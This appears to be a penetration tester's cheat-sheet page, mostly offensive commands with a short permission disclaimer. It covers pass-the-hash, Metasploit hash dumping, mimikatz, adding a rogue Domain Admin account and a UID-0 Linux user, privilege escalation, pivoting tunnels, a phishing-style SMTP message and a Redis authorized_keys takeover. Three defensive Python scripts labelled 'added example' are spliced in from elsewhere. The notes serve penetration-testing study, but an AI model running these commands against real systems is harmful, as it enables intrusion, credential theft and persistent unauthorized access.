Misc notes that still need to be sorted through and sent to their proper homes.
Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Markdown
{% hint style="warning" %} Text between these will show up in a Warning box. Looks nice! {% endhint %}
(Gitbook only!)
ls /usr/share/nmap/scripts/ | grep smb - find nmap scripts related to SMB; search this folder for scripts for any service you want to enumerate
-----
Cisco Smart Install client service available - pull the configs with SIET: siet.py -i 10.10.10.10 -g (SIET: https://github.com/Sab0tag3d/SIET/)
pass the hash
responder.py - or - write .lnk files to writeable shares that point back to the attacker - capture hashes and relay attacks. Mitigation: enable SMB signing and limit LLMNR (group policy). Detection: Respounder (detects Responder), ResponderGuard.
crackmapexec smb ip -u <name> -H <hash> --lsa - pass the hash. Detection: search for drsuapi in Wireshark; Windows event ID 4624 with user_reported_sid: S-1-0-0 and logon_process_name: ntlmssp.
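As an added example (not part of these notes), a small Python hunt over constructed 4624 records that picks out the NtLmSsp / S-1-0-0 network-logon pattern mentioned above and groups it by account and source address, since one source reaching many hosts over NTLM is what pass-the-hash lateral movement looks like in the logs. The field names are assumed to match what a SIEM would export.

```python
"""Hunt Windows Security 4624 events for the NTLM network-logon pattern noted above.
Sample events are constructed inline (not real telemetry); field names are assumed."""

# Constructed sample events, flattened the way a SIEM might expose 4624 fields.
EVENTS = [
    {"event_id": 4624, "logon_type": 3, "logon_process_name": "NtLmSsp",
     "auth_package": "NTLM", "subject_sid": "S-1-0-0",
     "target_user": "svc_backup", "src_ip": "10.10.10.5", "host": "DC01"},
    {"event_id": 4624, "logon_type": 3, "logon_process_name": "Kerberos",
     "auth_package": "Kerberos", "subject_sid": "S-1-0-0",
     "target_user": "alice", "src_ip": "10.10.10.21", "host": "FS01"},
    {"event_id": 4624, "logon_type": 2, "logon_process_name": "User32",
     "auth_package": "Negotiate", "subject_sid": "S-1-5-18",
     "target_user": "bob", "src_ip": "-", "host": "WS07"},
    {"event_id": 4624, "logon_type": 3, "logon_process_name": "NtLmSsp",
     "auth_package": "NTLM", "subject_sid": "S-1-0-0",
     "target_user": "svc_backup", "src_ip": "10.10.10.5", "host": "FS01"},
    {"event_id": 4624, "logon_type": 3, "logon_process_name": "NtLmSsp",
     "auth_package": "NTLM", "subject_sid": "S-1-0-0",
     "target_user": "svc_backup", "src_ip": "10.10.10.5", "host": "WS07"},
]


def is_ntlm_network_logon(ev):
    """The indicator from the notes: 4624, network logon (type 3), NtLmSsp,
    NULL subject SID. Every NTLM network logon matches, so this is a hunting
    filter to baseline against known scanners and backup hosts, not an alert."""
    return (ev["event_id"] == 4624 and ev["logon_type"] == 3
            and ev["logon_process_name"].lower() == "ntlmssp"
            and ev["subject_sid"] == "S-1-0-0")


def find_lateral_ntlm(events, min_hosts=2):
    """Group matching logons by (account, source IP) and keep the pairs that
    reached at least min_hosts distinct hosts: the spread pattern worth triaging."""
    hosts = {}
    for ev in events:
        if is_ntlm_network_logon(ev):
            hosts.setdefault((ev["target_user"], ev["src_ip"]), set()).add(ev["host"])
    return {k: sorted(v) for k, v in hosts.items() if len(v) >= min_hosts}


if __name__ == "__main__":
    for (user, src), targets in find_lateral_ntlm(EVENTS).items():
        print(f"{user} from {src} -> {', '.join(targets)}")
```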
Some programs have issues with rockyou.txt because the file is in the wrong encoding by default. Use the above to convert it to UTF-8 so it works with these programs.
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
[+] Word Count
wc -l tmp2 Count the number of lines in a file
[+] sort
sort -u file Sort by unique
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n Sort IP addresses correctly
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address
[+] awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
[+] colors
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"
[+] Make a file executable.
chmod +x file
chmod 755 file
[+] Reminders
LOG EVERYTHING!
Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop
Set IP address
ifconfig eth0 192.168.50.12/24
Set default gateway
route add default gw 192.168.50.9
Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf
Show routing table
Windows - route print
Linux - route -n
Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9
Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0
[+] External Infrastructure Testing - Information Gathering
WHOIS Querying
whois www.domain.com
Resolve an IP using DIG
host www.google.com 8.8.8.8
Find Mail servers for a domain
host -t mx www.gmail.com 8.8.8.8
Find any DNS records for a domain
host -t any www.google.com 8.8.8.8
Zone Transfer
host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys
auxiliary/gather/enum_dns
Fierce
fierce -dns <domain> -wordlist <wordlist>
[+] External Infrastructure Testing - VPN Testing
ike-scan
ike-scan 192.168.207.134
sudo ike-scan -A 192.168.207.134
sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
pskcrack
psk-crack -b 5 192-168-207-134key
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary 192-168-207-134key
[+] Internal Infrastructure Testing - Network Enumeration
DHCP Information - Use ipconfig /all to obtain useful information.
Network Sniffing (Wireshark, tshark, tcpdump)
Sniffing is a great passive method for mapping networks and systems. Typically, you’ll see a lot of broadcast traffic such as DNS, NBNS, BROWSER, and Cisco protocols that reveal hostnames, active subnets, VLANS, and domain names.
Net view
net view /ALL /Domain:clientdomain.com
ARP Scan
arp-scan 192.168.50.8/28 -I eth0
Nmap ping scan
sudo nmap -sn -oA nmap_pingscan 192.168.100.0/24
Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
Nmap all port version scan
sudo nmap -sTV -p0- -A --stats-every 10s --reason --min-rate 1000 -oA nmap_scan 192.168.0.1/24
Nmap UDP all port scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24
Nmap source port scanning
nmap -g <port> - set the source port, e.g. 88 (Kerberos), 53 (DNS) or 67 (DHCP)
Hping3 scanning
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response
[+] Internal Infrastructure Testing - Windows Domain Enumeration
Obtain domain information using windows
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
DNS Lookup
nslookup -type=SRV _ldap._tcp.
User/Domain enumeration using RDP
rdesktop 172.16.100.141 -u ""
Net Group Command
net group "Domain Controllers" /domain
Netbios enumeration
nbtscan -r 192.168.0.1-100
nbtscan -f hostfiles.txt
enum4linux
RID cycling
use auxiliary/scanner/smb/smb_lookupsid
ridenum
Net Users
net users /domain
Null session in windows
net use \\192.168.0.1\IPC$ "" /u:""
Null session in linux
smbclient -L //192.168.99.131
nbtscan
nbtscan -r 10.0.2.0/24
Sharepoint User Profile Page
Find SharePoint servers with nmap, Nessus etc.
Net Accounts - Obtain Password Policy
net accounts
[+] Internal Infrastructure Testing - Quick Domain Administrator Compromise
Compromise machine via missing Microsoft patch, weak credentials or credentials found via Responder.
From Shell - net group "Domain Admins" /domain
Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run
msf> spool off
Compromise the administrator's machine
meterpreter > load mimikatz
meterpreter > wdigest
or
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\administrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
[+] Internal Infrastructure Testing - Post Exploitation
Meterpreter
meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig
meterpreter> run post/windows/gather/checkvm
meterpreter> run get_local_subnets
Privilege Escalation (If Required)
run post/windows/escalate/getsystem
use post/windows/escalate/droplnk
use exploit/windows/local/bypassuac
use exploit/windows/local/service_permissions
use exploit/windows/local/trusted_service_path
use exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ms_ndproxy
use exploit/windows/local/ask
meterpreter> run getcountermeasure
meterpreter> run winenum
meterpreter> run post/windows/gather/smart_hashdump
meterpreter> run post/windows/gather/credentials/sso
meterpreter> run post/windows/gather/cachedump
meterpreter> run post/windows/gather/lsa_secrets
meterpreter> run post/windows/gather/smart_hashdump
meterpreter> run post/windows/gather/enum_ad_computers
meterpreter> run post/windows/gather/win_privs
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token TVM\domainadmin
meterpreter > add_user hacker password1 -h 192.168.0.10
meterpreter > add_group_user "Domain Admins" hacker -h 192.168.0.10
meterpreter > load mimikatz
meterpreter > wdigest
Dump remote SAM:
meterpreter> run post/windows/gather/smart_hashdump
Impacket (Python)
psexec.py
secretsdump.py
Kitrap0d
Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell
Add Linux User
/usr/sbin/useradd -g 0 -u 0 -o user
echo user:password | /usr/sbin/chpasswd
Solaris Commands
useradd -o user
passwd user
usermod -R root user
RSERVICES
---------
rwho 192.168.0.1
rlogin -l root 192.168.0.17
RPC Services
------------
rpcinfo -p
Endpoint_mapper metasploit
Windows Enumeration
Find Group Policy Preference XML files:
C:\> findstr /S cpassword %logonserver%\sysvol\*.xml
meterpreter > run post/windows/gather/credentials/gpp
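Added example (not from these notes): a Python audit of Group Policy Preference XML files for cpassword attributes, the defender's counterpart to the findstr command above, so stale GPP passwords can be found and removed from SYSVOL. The SYSVOL paths and XML bodies below are constructed.

```python
"""Audit Group Policy Preference XML files for stored cpassword attributes.
Sample paths and XML are constructed; the clsid values are placeholders."""
import os
import xml.etree.ElementTree as ET

# Constructed sample: one Groups.xml still carrying a cpassword, one that is clean.
SAMPLES = {
    r"\\dc01\sysvol\corp.local\Policies\{GUID-1}\Machine\Preferences\Groups\Groups.xml": """\
<Groups clsid="{CONSTRUCTED}">
  <User clsid="{CONSTRUCTED}" name="localadmin" changed="2014-01-01 00:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED_CIPHERTEXT_PLACEHOLDER" userName="localadmin"/>
  </User>
</Groups>""",
    r"\\dc01\sysvol\corp.local\Policies\{GUID-2}\Machine\Preferences\Groups\Groups.xml": """\
<Groups clsid="{CONSTRUCTED}">
  <Group clsid="{CONSTRUCTED}" name="Administrators (built-in)">
    <Properties action="U" groupName="Administrators (built-in)"/>
  </Group>
</Groups>""",
}


def find_cpassword(xml_text, path):
    """Return one finding per element carrying a non-empty cpassword attribute.
    The ciphertext itself is never printed; only its presence and length."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cp = elem.get("cpassword")
        if cp:
            findings.append({
                "file": path,
                "element": elem.tag,
                "user": elem.get("userName") or elem.get("accountName") or "?",
                "ciphertext_len": len(cp),
            })
    return findings


def audit_files(files):
    """files: {path: xml_text}. Aggregate findings across all files."""
    out = []
    for path, text in files.items():
        out.extend(find_cpassword(text, path))
    return out


def audit_sysvol(root_dir):
    """Walk a mounted SYSVOL copy and audit every .xml file under it."""
    files = {}
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            if name.lower().endswith(".xml"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:
                    files[full] = fh.read()
    return audit_files(files)


if __name__ == "__main__":
    for f in audit_files(SAMPLES):
        print(f"{f['file']}: <{f['element']}> user={f['user']} cpassword present")
```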
[+] Pivoting - Lateral Movement
SSH Tunneling:
Remote forward port 222
ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118
meterpreter> run arp_scanner -r 10.10.10.0/24
route add 10.10.10.10 255.255.255.248 <session>
use auxiliary/scanner/portscan/tcp
autoroute:
meterpreter > ipconfig
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > getsystem
meterpreter > run hashdump
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > use exploit/windows/smb/psexec
port forwarding:
meterpreter > run autoroute -s 10.1.13.0/24
use auxiliary/scanner/portscan/tcp
meterpreter > portfwd add -l <listening port> -p <remote port> -r <remote/internal host>
socks proxy:
route add 10.10.10.10 255.255.255.248 <session>
use auxiliary/server/socks4a
Add proxy to /etc/proxychains.conf
proxychains nmap -sT -T4 -Pn 10.10.10.50
setg Proxies socks4:127.0.0.1:1080
ncat -C mail.host.com 25
EHLO hostname
MAIL FROM: test@host.com
RCPT TO: www@host.com
DATA
From: A tester <test@host.com>
To: <www@host.com>
Date: date
Subject: A test message from hostname
Click me, please http://10.10.10.10/
.
QUIT
Useful Commands
[+] Remove text using sed
cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g'
[+] Port forwarding using NCAT
ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443"
[+] Windows 7 or later, build port relay
C:\> netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>
[+] Grab HTTP Headers
curl -LIN <host>
[+] Quickly generate an MD5 hash for a text string using OpenSSL
echo -n 'text to be hashed' | openssl md5
[+] Shutdown a Windows machine from Linux
net rpc shutdown -I ipAddressOfWindowsPC -U username%password
[+] Conficker Detection with NMAP
nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES
[+] Determine if a port is open with bash
(: </dev/tcp/127.0.0.1/80) &>/dev/null && echo "OPEN" || echo "CLOSED"
Port Scanning
Connect Scanning
The simplest TCP port scanning technique, usually called CONNECT scanning, relies on the three-way TCP handshake mechanism.
Connect port scanning involves attempting to complete a three-way handshake with the target host on the specified port(s).
If the handshake is completed, this indicates that the port is open.
# TCP Netcat port scan on ports 3388-3390
> nc -nvv -w 1 -z 10.0.0.19 3388-3390
# -n :: numeric-only IP addresses, no DNS
# -v :: verbose; use twice to be more verbose
# -w :: (secs) timeout for connects and final net reads
# -z :: zero-I/O mode (used for scanning)
Stealth / SYN Scanning
SYN scanning, or stealth scanning, is a TCP port scanning method that involves sending SYN packets to various ports on a target machine without completing a TCP handshake.
If a TCP port is open, a SYN-ACK should be sent back from the target machine, informing us that the port is open, without the need to send a final ACK back to the target machine.
With early and primitive firewalls, this method would often bypass firewall logging, as this logging was limited to completed TCP sessions.
This is no longer true with modern firewalls, and the term stealth is misleading. Users might believe their scans will somehow not be detected, when in fact, they will be.
UDP port scanning is often unreliable, as firewalls and routers may drop ICMP packets. This can lead to false positives in your scan, and you will regularly see UDP port scans showing all UDP ports open on a scanned machine.
Most port scanners do not scan all available ports, and usually have a preset list of “interesting ports” that are scanned.
People often forget to scan for UDP services, and stick only to TCP scanning, thereby seeing only half of the equation.
Port Scanning with Nmap
A default nmap TCP scan will scan the 1000 most popular ports on a given machine.
# We'll scan one of my local machines while monitoring the amount
# of traffic sent to the specific host using iptables.
> iptables -I INPUT 1 -s 10.0.0.19 -j ACCEPT
> iptables -I OUTPUT 1 -d 10.0.0.19 -j ACCEPT
> iptables -Z
# -I :: insert in chain as rulenum (default 1=first)
# -s :: source (address)
# -j :: jump target for the rule
# -Z :: zero the packet and byte counters of all chains
> nmap -sT 10.0.0.19
> iptables -vn -L
> iptables -Z
# -sT :: TCP Connect Scan
# -v :: Display more information in the output (packet and byte counters)
# -L :: List the current filter rules.
> nmap -sT -p 1-65535 10.0.0.19
> iptables -vn -L
# -p :: port range
This default 1000 port scan has generated around 72KB of traffic.
A similar local port scan explicitly probing all 65535 ports would generate about 4.5 MB of traffic, a significantly higher amount.
However, this full port scan has discovered two new ports that were not found by the default TCP scan: ports 180 and 25017.
A full nmap scan of a class C network (254 hosts) would result in sending over 1000 MB of traffic to the network.
So, if we are in a position where we can’t run a full port scan on the network, what can we do?
Network Sweeping
To deal with large volumes of hosts, or to otherwise try to conserve network traffic, we can attempt to probe these machines using Network Sweeping techniques.
Machines that filter or block ICMP requests may seem down to a ping sweep, so it is not a definitive way to identify which machines are really up or down.
> nmap -sP 192.168.1.0/24 ## Deprecated in modern versions Use -sn instead
Show ips of connected devices
> nmap -sn 192.168.11.200-250
# -sn :: ping scan
# using the grep command can give you output that’s difficult to manage.
# let’s use Nmap’s “greppable” output parameter (-oG)
> nmap -v -sn 192.168.11.200-250 -oG ping-sweep.txt
> grep Up ping-sweep.txt | cut -d " " -f 2
# we can sweep for specific TCP or UDP ports (-p) across the network
> nmap -p 80 192.168.11.200-250 -oG web-sweep.txt
> grep open web-sweep.txt |cut -d " " -f 2
# we are conducting a scan for the top 20 TCP ports.
> nmap -sT -A --top-ports=20 192.168.11.200-250 -oG top-port-sweep.txt
Machines that prove to be rich in services, or otherwise interesting, would then be individually port scanned, using a more exhaustive port list.
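Added example, not from the notes: a Python parser for nmap's greppable (-oG) output that replaces the grep/cut pipelines above and pulls out which hosts are up and their open ports with service and version, so sweep results can be filtered reliably. The -oG lines are constructed in nmap's format.

```python
"""Parse nmap greppable (-oG) output into a host -> open-port map.
Sample -oG lines are constructed inline in nmap's format."""
import re

# Constructed sample: two hosts up (one with version info), one down.
SAMPLE_OG = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 192.168.11.200 ()\tStatus: Up
Host: 192.168.11.200 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9/, 80/open/tcp//http//Apache httpd 2.4.38/, 443/closed/tcp//https///\tIgnored State: closed (997)
Host: 192.168.11.201 ()\tStatus: Up
Host: 192.168.11.201 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: filtered (999)
Host: 192.168.11.202 ()\tStatus: Down
# Nmap done (constructed sample)
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
# port/state/proto//service//version/  (fields nmap emits in the Ports: column)
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_og(text):
    """Return {ip: {"name": str, "up": bool, "ports": [(port, proto, service, version)]}}.
    Only ports in state 'open' are kept."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything that is not a Host: record
        ip, name = m.group(1), m.group(2)
        h = hosts.setdefault(ip, {"name": name, "up": False, "ports": []})
        if "\tStatus: Up" in line:
            h["up"] = True
        if "\tPorts:" in line:
            ports_field = line.split("\tPorts:", 1)[1].split("\tIgnored State:", 1)[0]
            for port, state, proto, svc, ver in PORT_RE.findall(ports_field):
                if state == "open":
                    h["ports"].append((int(port), proto, svc, ver))
    return hosts


def hosts_with_port(hosts, port):
    """IPs exposing the given open port, for a sweep like the port-80 one above."""
    return sorted(ip for ip, h in hosts.items() if any(p[0] == port for p in h["ports"]))


if __name__ == "__main__":
    result = parse_og(SAMPLE_OG)
    print("up:", [ip for ip, h in result.items() if h["up"]])
    print("445 open on:", hosts_with_port(result, 445))
```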
OS Fingerprinting
# OS fingerprinting (-O parameter).
> nmap -O 10.0.0.19
Banner Grabbing/Service Enumeration
Nmap can also help identify services on specific ports, by banner grabbing, and running several enumeration scripts (-sV and -A parameters).
> nmap -sV -sT 10.0.0.19
# -sV :: probe open ports to determine service / version info
Nmap Scripting Engine (NSE)
The scripts include a broad range of utilities, from DNS enumeration and brute-force scripts to vulnerability identification scripts.
All NSE scripts can be found in the /usr/share/nmap/scripts directory
> nmap 10.0.0.19 --script smb-os-discovery.nse
# Another useful script is the DNS zone transfer NSE script
> nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
SMB Enumeration
SMB1 – Windows 2000, XP and Windows 2003.
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
Scanning for the NetBIOS Service
The SMB/NetBIOS service listens on TCP ports 139 and 445, as well as several UDP ports.
There are other, more specialized, tools for specifically identifying NetBIOS information
> nbtscan -r 192.168.11.0/24
Null Session Enumeration
A null session refers to an unauthenticated NetBIOS session between two computers. This feature exists to allow unauthenticated machines to obtain browse lists from other Microsoft servers.
A null session also allows unauthenticated hackers to obtain large amounts of information about the machine, such as password policies, usernames, group names, machine names, user and host SIDs.
This Microsoft feature existed in SMB1 by default and was later restricted in subsequent versions of SMB.
> enum4linux -a 192.168.11.227
Nmap SMB NSE Scripts
# These scripts can be found in the /usr/share/nmap/scripts directory
> ls -l /usr/share/nmap/scripts/smb-*
# We can see that several interesting Nmap SMB NSE scripts exist, such as OS discovery
# and enumeration of various pieces of information from the protocol
> nmap -v -p 139,445 --script=smb-os-discovery 192.168.11.227
# To check for known SMB protocol vulnerabilities,
# you can invoke the nmap smb-check-vulns script
> nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 192.168.11.201
SMTP Enumeration
Mail servers can also be used to gather information about a host or network.
SMTP supports several important commands, such as VRFY and EXPN.
A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list.
These can often be abused to verify existing users on a mail server, which can later aid the attacker.
# This procedure can be used to help guess valid usernames.
> nc -nv 192.168.11.215 25
Examine the following simple Python script that opens a TCP socket, connects to the SMTP server, and issues a VRFY command for a given username.
#!/usr/bin/python3
import socket
import sys

if len(sys.argv) != 2:
    print("Usage: vrfy.py <username>")
    sys.exit(0)

# Create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the server
s.connect(('192.168.11.215', 25))

# Receive the banner
banner = s.recv(1024)
print(banner.decode(errors="replace"))

# VRFY a user (a space after VRFY and CRLF to end the command)
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
result = s.recv(1024)
print(result.decode(errors="replace"))

# Close the socket
s.close()
-----
Port Scanning :
nmap -sC -sV -oN nmap -A -T5 10.10.10.x
Host Discovery
• nmap -sn 10.10.1.1-254 -vv -oA hosts
• netdiscover -r 10.10.10.0/24
DNS server discovery
• nmap -p 53 10.10.10.1-254 -vv -oA dcs
NSE Scripts Scan
* nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan)
Port specific NSE script list :
ls /usr/share/nmap/scripts/ssh*
ls /usr/share/nmap/scripts/smb*
SMB v1 in Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016
In the output of config get * you can find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh); knowing this, you know where you can write the authorized_keys file to access the box via ssh as the user redis. If you know the home of another valid user where you have write permissions you can also abuse it:
Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa
Write the public key to a file : (echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
Import the file into redis : cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
Save the public key to the authorized_keys file on redis server:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /home/test/.ssh/
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK